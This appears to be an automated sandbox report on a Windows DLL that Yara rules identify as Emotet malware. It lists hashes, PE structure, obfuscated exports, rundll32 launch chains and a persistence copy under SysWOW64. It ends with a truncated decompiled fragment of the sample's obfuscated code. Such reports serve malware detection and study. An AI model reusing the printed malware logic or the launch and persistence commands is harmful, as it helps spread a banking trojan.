                        Preview: regfI...I...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmN..dY...............................................................................................................................................................................................................................................................................................................................................W.9........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):3.7210167206825284
                        Encrypted:false
                        SSDEEP:384:IM85K5ycv4KgnVVeeDzeh1NKZtjZT8GRFw5nZ:/KKpg/eeDzezNYtjeGRFw5
                        MD5:88C16E7CDB64AF7249CD901E896336CD
                        SHA1:D765FD096A3F68B62960E7ACC226D37B33EB386B
                        SHA-256:F1AA2A23F3D3AD22B309C19A41AEA2602508D2DF0FC03E6C55BFA24B5E152807
                        SHA-512:4F203C32CB0E6249BEE2D8E077349F88DA9004E52901DB00D1D28BB06174DE2C07C2E343A07CC1CCA6E6BA414F114ADDD3AB132A63FBC4E51798EC8700BF8C15
                        Malicious:false
                        Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmN..dY...............................................................................................................................................................................................................................................................................................................................................Q.9HvLE.>......H.............-.x..8...............................hbin................p.\..,..........nk,.N..dY....... ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .N..dY....... ........................... .......Z.......................Root........lf......Root....nk .N..dY................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.0673340607178154
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:nhlHEF5IVY.dll
                        File size:372736
                        MD5:222719bd9555a8f48428737ab34a6fa6
                        SHA1:b56136e6d1460055917dcb74ed849c59b35300c0
                        SHA256:81823e821dae4e623a5f11ccbed6e628443301afd92c0ab25e19d847927f5318
                        SHA512:170c8e8ab85e18b97c6fe31d9ffb811fe2b67f92ca843d684ecaef75d3454bcf9584035746015305955e7f1b51281c8dcf1b5476c1c55244c8205dfdf4d0dd82
                        SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJy46CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLNRQKqV4epRmxAvAD
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                        File Icon

                        Icon Hash:74f0e4ecccdce0e4

                        Static PE Info

                        General

                        Entrypoint:0x1001a401
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                        TLS Callbacks:0x1000c500
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:609402ef170a35cc0e660d7d95ac10ce

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007F991C889557h
                        call 00007F991C8898E8h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007F991C889403h
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        push ebp
                        mov ebp, esp
                        push dword ptr [ebp+08h]
                        call 00007F991C889DFEh
                        pop ecx
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        jmp 00007F991C88955Fh
                        push dword ptr [ebp+08h]
                        call 00007F991C88D8E4h
                        pop ecx
                        test eax, eax
                        je 00007F991C889561h
                        push dword ptr [ebp+08h]
                        call 00007F991C88D960h
                        pop ecx
                        test eax, eax
                        je 00007F991C889538h
                        pop ebp
                        ret
                        cmp dword ptr [ebp+08h], FFFFFFFFh
                        je 00007F991C889EC3h
                        jmp 00007F991C889EA0h
                        push ebp
                        mov ebp, esp
                        push 00000000h
                        call dword ptr [1002808Ch]
                        push dword ptr [ebp+08h]
                        call dword ptr [10028088h]
                        push C0000409h
                        call dword ptr [10028040h]
                        push eax
                        call dword ptr [10028090h]
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 00000324h
                        push 00000017h
                        call dword ptr [10028094h]
                        test eax, eax
                        je 00007F991C889557h
                        push 00000002h
                        pop ecx
                        int 29h
                        mov dword ptr [1005AF18h], eax
                        mov dword ptr [1005AF14h], ecx
                        mov dword ptr [1005AF10h], edx
                        mov dword ptr [1005AF0Ch], ebx
                        mov dword ptr [1005AF08h], esi
                        mov dword ptr [1005AF04h], edi
                        mov word ptr [eax], es

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x583900x8ac.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x58c3c0x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1bb0.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x56fdc0x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x571000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x570300x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x280000x154.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x264f40x26600False0.546620521173data6.29652715831IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x280000x313fa0x31400False0.822468868972data7.43226452981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x5a0000x18440xe00False0.270647321429data2.60881097454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .pdata0x5c0000x66c0x800False0.3583984375data2.21689595795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .reloc0x5d0000x1bb00x1c00False0.784598214286data6.62358237634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                        USER32.dllGetDC, ReleaseDC, GetWindowRect

                        Exports

                        NameOrdinalAddress
                        Control_RunDLL10x100010a0
                        ajkaibu20x100016c0
                        akyncbgollmj30x10001480
                        alrcidxljxybdggs40x10001860
                        bgmotrriehds50x10001820
                        bojkfvynhhupnooyb60x100019f0
                        bujuoqldqlzaod70x10001800
                        bunsahctogxzts80x100019e0
                        cjogbtafwukesw90x10001830
                        csbbcaopuok100x100016a0
                        cyqrjpaeorjur110x100015f0
                        dlrzuyaeqj120x10001840
                        egiimrq130x10001850
                        evhgyts140x100014f0
                        fdqpjjjyuw150x100017e0
                        finabzjyxhxnnuuv160x10001510
                        fkeacqpbbfw170x10001910
                        fuwsgzf180x10001790
                        fzbmpailk190x10001980
                        gamsrhauvgl200x10001810
                        gjfqgtgk210x10001a10
                        gwsmfxfmekkyr220x100018b0
                        haymuvtatadeydqmk230x10001530
                        hqruohhkvpdalhq240x10001620
                        htdaydfvtjlujwcaj250x10001660
                        hzyrvjtx260x100017c0
                        ifnsupqhxkwj270x10001870
                        ijhgowlpmypocg280x10001720
                        ispjhrqaxnyflnn290x100015a0
                        iszvcqv300x100017a0
                        ixgucop310x100018d0
                        jcdvrhrguqtjpkc320x100016b0
                        jkfyadsdpoks330x100019c0
                        kfzgxmljkwaqy340x10001730
                        kzfvroxozxufciczm350x10001740
                        lpstjqa360x10001900
                        ltkoyvzovzkqemyw370x10001630
                        mdigcwjymnzvgaql380x100014d0
                        mefathlzguuhqodfx390x10001950
                        mgsrmfbja400x10001500
                        mrxhcceopg410x100014a0
                        nafhmuoq420x100018f0
                        nefxgpc430x100018a0
                        nrehxpiznrppeu440x10001690
                        nucocnvjyqp450x100018e0
                        obxoxtcbntaxofr460x10001890
                        ofrzojd470x100016e0
                        oofbctfc480x10001550
                        opzpazspbecyjojf490x100015b0
                        oqoigff500x10001a00
                        oujlzhzvhjh510x100016f0
                        ovpsanbypajv520x100015e0
                        pblpcaadqbdxyb530x10001680
                        ragwdgnyohftj540x100017d0
                        rfosmac550x10001710
                        rgymbuetvifqjqdlo560x10001930
                        rmoxbxbbgidnbds570x10001970
                        rxnkmfbycdcc580x10001560
                        sefltbc590x10001880
                        sgieprcsphl600x100019a0
                        shpcmnqzvyltgdt610x100016d0
                        slktbekupvmdbt620x100015c0
                        sormivnk630x10001570
                        tdblkstlyin640x10001600
                        tkllyrc650x10001650
                        tkwpnvfqnbpbdqe660x10001a20
                        tnhtgnjrabqakgeke670x10001700
                        tzpmcwwig680x10001520
                        uceklmggjof690x10001610
                        ukwdddyj700x10001640
                        uwnaptydgur710x10001940
                        vjusqoeo720x10001580
                        vnyufpq730x10001590
                        vsrwmkhzkrtlexxb740x100014e0
                        wermsdfzb750x10001770
                        wkhpfdjkypy760x100014c0
                        wksndtayhfm770x100015d0
                        wnjvxspilxpchq780x10001670
                        wuqwfssiddrcl790x10001570
                        wyyhtqptznbrknitg800x100017f0
                        wzkcijdvadq810x10001540
                        wzxlvxuyy820x100019b0
                        xhtxeilfgsghxik830x10001780
                        xvdijhconoukll840x100014b0
                        ybbwnezvxfafm850x10001750
                        yeylpreasnzamgac860x100019d0
                        ypkidshxgzkkehc870x100018c0
                        ypzvmpfbgai880x10001760
                        zbrzizodycg890x10001990
                        zdiuqcnzg900x10001920
                        zfkwwtxd910x10001490
                        zktykfwmaehxg920x10001600
                        zmkbqvofdhermov930x10001960
                        zvtqmkitgmzgo940x100017b0

                        Network Behavior

                        No network behavior found

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: loaddll32.exe PID: 4612 Parent PID: 5256

                        General

                        Start time:09:46:23
                        Start date:02/12/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll"
                        Imagebase:0x1290000
                        File size:893440 bytes
                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.970291608.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.970291608.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.993619798.00000000005BB000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.948659088.00000000005BB000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.969710134.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.969710134.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.946894712.00000000005BB000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.948115797.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.948115797.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.969859357.00000000005BB000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.970456137.00000000005BB000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.946627209.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.946627209.00000000001C0000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 3792 Parent PID: 4612

                        General

                        Start time:09:46:24
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 3112 Parent PID: 4612

                        General

                        Start time:09:46:24
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000003.899666067.0000000000B2B000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000003.899666067.0000000000B2B000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.933922652.00000000008E0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.933922652.00000000008E0000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5228 Parent PID: 3792

                        General

                        Start time:09:46:24
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.930138580.0000000000750000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.930138580.0000000000750000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.936268035.000000000092A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 3000 Parent PID: 4612

                        General

                        Start time:09:46:28
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.946359714.00000000031A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.946359714.00000000031A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.946802756.000000000371A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 4804 Parent PID: 4612

                        General

                        Start time:09:46:35
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.946676422.0000000000E30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.946676422.0000000000E30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.947178520.00000000032AA000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 3080 Parent PID: 3112

                        General

                        Start time:09:48:12
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Rxalrmpxe\bkor.jtg",APfz
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1048939362.000000000373A000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.1048437033.0000000003400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1048437033.0000000003400000.00000040.00000001.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5104 Parent PID: 5228

                        General

                        Start time:09:48:14
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 3484 Parent PID: 3000

                        General

                        Start time:09:48:25
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5356 Parent PID: 4804

                        General

                        Start time:09:48:31
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 6032 Parent PID: 568

                        General

                        Start time:09:48:32
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Imagebase:0x7ff6eb840000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 5916 Parent PID: 6032

                        General

                        Start time:09:48:32
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4612 -ip 4612
                        Imagebase:0x1350000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 3880 Parent PID: 4612

                        General

                        Start time:09:48:34
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 304
                        Imagebase:0x1350000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 1664 Parent PID: 6032

                        General

                        Start time:09:48:43
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4612 -ip 4612
                        Imagebase:0x1350000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 2848 Parent PID: 4612

                        General

                        Start time:09:48:44
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 336
                        Imagebase:0x1350000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5824 Parent PID: 3080

                        General

                        Start time:09:49:16
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Rxalrmpxe\bkor.jtg",Control_RunDLL
                        Imagebase:0x10b0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Disassembly

                        Code Analysis

                        Reset < >

                          Analysis Process: loaddll32.exe PID: 4612 Parent PID: 5256 loaddll32.exeCOMMON

                          Executed Functions

                          Function 001E1291, Relevance: 10.4, Strings: 8, Instructions: 383COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E001E1291() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed short* _t429;
				signed int _t440;
				signed int _t442;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t461;
				signed int* _t491;
				void* _t492;
				signed short* _t498;
				signed int* _t499;

				_t499 =  &_v1728;
				_v1572 = 0x85db5f;
				_v1572 = _v1572 + 0xabd9;
				_v1572 = _v1572 ^ 0x00868711;
				_v1664 = 0xec20c6;
				_v1664 = _v1664 ^ 0x8ebb32ad;
				_v1664 = _v1664 >> 0xe;
				_v1664 = _v1664 ^ 0xc9da4224;
				_v1664 = _v1664 ^ 0xc9d33214;
				_v1672 = 0x7aeab7;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 >> 0x10;
				_v1672 = _v1672 * 0x29;
				_t442 = 0;
				_v1672 = _v1672 ^ 0x00070a11;
				_t492 = 0x1e2f185;
				_v1636 = 0x817462;
				_v1636 = _v1636 | 0x24691976;
				_v1636 = _v1636 + 0x95f6;
				_v1636 = _v1636 ^ 0x24ec5d0b;
				_v1644 = 0x77a6a5;
				_v1644 = _v1644 + 0xffffc90e;
				_v1644 = _v1644 << 1;
				_v1644 = _v1644 ^ 0x00e59261;
				_v1680 = 0xf31be;
				_v1680 = _v1680 | 0xd650deff;
				_v1680 = _v1680 << 9;
				_v1680 = _v1680 + 0xf487;
				_v1680 = _v1680 ^ 0xc00e87b4;
				_v1688 = 0x6142cc;
				_v1688 = _v1688 << 0x10;
				_v1688 = _v1688 | 0xd67339e5;
				_v1688 = _v1688 << 0xd;
				_v1688 = _v1688 ^ 0xe7390e48;
				_v1576 = 0x6cc5f;
